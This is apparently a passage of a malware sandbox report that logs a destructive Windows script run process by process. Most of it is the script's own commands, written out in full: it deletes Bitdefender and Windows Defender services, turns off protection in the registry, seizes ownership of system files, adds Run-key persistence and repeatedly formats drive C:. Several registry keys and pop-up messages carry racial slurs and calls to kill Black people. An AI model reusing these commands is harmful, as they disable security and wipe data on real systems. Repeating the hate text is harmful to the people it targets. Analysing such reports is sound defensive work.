- Launches sc.exe
PID:3588
-
-
C:\Windows\system32\sc.exesc stop epssecurityservice4⤵
- Launches sc.exe
PID:3704
-
-
C:\Windows\system32\sc.exesc delete epssecurityservice4⤵
- Launches sc.exe
PID:3732
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f4⤵PID:5584
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f4⤵PID:3700
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f4⤵PID:780
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f4⤵PID:3904
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f4⤵PID:1608
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f4⤵PID:3968
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f4⤵PID:988
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f4⤵PID:3476
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f4⤵PID:2964
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f4⤵PID:6136
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f4⤵PID:4976
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:1900
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵PID:4800
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f4⤵PID:3976
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f4⤵PID:6084
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f4⤵PID:5440
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:3452
-
-
C:\Windows\system32\sc.exesc delete WinDefend4⤵
- Launches sc.exe
PID:1260
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵PID:460
-
-
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵
- Launches sc.exe
PID:3448
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
PID:5028
-
-
C:\Windows\system32\sc.exesc delete Sense4⤵
- Launches sc.exe
PID:1096
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MsMpEng.exe /T4⤵
- Kills process with taskkill
PID:4324
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MpCmdRun.exe /T4⤵
- Kills process with taskkill
PID:4716
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthSystray.exe /T4⤵
- Kills process with taskkill
PID:4936
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM smartscreen.exe /T4⤵
- Kills process with taskkill
PID:5420
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5052
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5528
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2804
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6088
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵PID:288
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f4⤵PID:3860
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f4⤵PID:3568
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f4⤵PID:3336
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\notepad.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2744
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\calc.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1516
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3744
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5956
-
-
C:\Windows\system32\powercfg.exepowercfg /hibernate off REM Disables hibernation4⤵
- Power Settings
PID:4080
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in4⤵
- Power Settings
PID:3132
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-dc 0 REM Prevents sleep on battery4⤵
- Power Settings
PID:2152
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in4⤵
- Power Settings
PID:2532
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "Device Name"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:1032
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "USB Root Hub"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:2440
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f4⤵
- Adds Run key to start application
PID:5544
-
-
C:\Windows\system32\reg.exereg add "HKCR\behead all niggers" /f4⤵
- Modifies registry class
PID:1204
-
-
C:\Windows\system32\reg.exereg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f4⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"4⤵PID:1644
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f4⤵
- Adds Run key to start application
PID:2956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k4⤵PID:4300
-
C:\Windows\system32\reg.exereg query "HKU" /s /f "Software" /k5⤵PID:4620
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1420
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:2932
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:5888
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\SOFTWARE\Software\Rasauq on top" /f4⤵PID:5520
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:5804
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3500
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:2760
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4492
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Software\Rasauq on top" /f4⤵PID:3760
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\AppDataLow\Software\Software\Rasauq on top" /f4⤵PID:4456
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵PID:4260
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f4⤵PID:2976
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:5688
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:1392
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:4444
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:1736
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:3392
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:5140
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:1948
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:2612
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5916
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1160
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:2512
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:220
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:1664
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4224
-
-
C:\Windows\system32\reg.exereg add "End of search: 26 match(es) found.\Software\Rasauq on top" /f4⤵PID:1964
-
-
C:\Windows\system32\msg.exemsg * /time:3 "This machine has been compromised by Rasuaq"4⤵PID:4908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=17424670400714⤵PID:2528
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak4⤵
- Delays execution with timeout.exe
PID:5872
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f4⤵PID:4380
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2512
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:220
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1664
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3468
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3144
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:288
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4292
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:5500
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6048
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5416
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4924
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5844
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1664
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1964
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:1708
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:476
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:420
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3928
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4100
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4572
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4300
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1792
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4664
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4072
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2760
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1140
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1444
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1552
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5968
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2864
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4164
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3644
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1192
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:544
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4004
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1420
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4596
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4124
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3900
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1676
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:608
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1084
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2908
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2044
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5324
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5888
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1376
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3976
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5128
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5704
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2716
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4836
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4884
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:544
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2840
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5324
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4388
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:5900
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:2032
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5568
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2672
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4552
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:700
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4820
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2976
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5968
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3784
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2032
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:1168
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5612
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2300
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2840
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2128
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4068
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5324
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4508
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4876
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3944
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:1956
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4832
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5760
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:572
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2128
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4924
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3488
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:716
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4188
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4680
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5468
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6036
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4064
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6052
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5760
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1664
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3528
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2760
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3528
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2968
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6216
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6280
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6336
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6352
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6368
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6392
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6432
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6448
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6616
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6748
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6944
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:7024
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7068
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7104
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7120
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7136
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6156
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6164
-
-
